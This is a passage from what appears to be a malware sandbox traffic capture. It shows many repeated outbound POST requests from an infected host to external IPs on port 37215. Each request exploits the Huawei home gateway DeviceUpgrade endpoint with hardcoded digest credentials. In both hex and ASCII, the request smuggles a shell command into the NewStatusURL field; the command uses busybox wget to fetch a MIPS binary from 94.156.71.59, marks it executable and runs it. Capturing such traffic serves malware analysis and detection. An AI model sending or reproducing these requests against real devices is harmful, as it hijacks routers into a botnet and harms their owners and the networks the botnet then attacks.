                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            245192.168.2.135846441.57.17.16437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.189174891 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            246192.168.2.1346504197.0.201.18537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.190023899 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            247192.168.2.133286241.237.134.24237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.190865040 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            248192.168.2.134840641.226.55.10937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.191720963 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            249192.168.2.1348172156.168.245.2937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.192522049 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            250192.168.2.133465241.154.67.637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.193306923 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            251192.168.2.1343578197.105.96.23437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.193999052 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            252192.168.2.1337402197.153.65.15837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.194715023 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            253192.168.2.1334518156.156.125.19337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.195434093 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            254192.168.2.1348942197.159.13.23337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.196296930 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
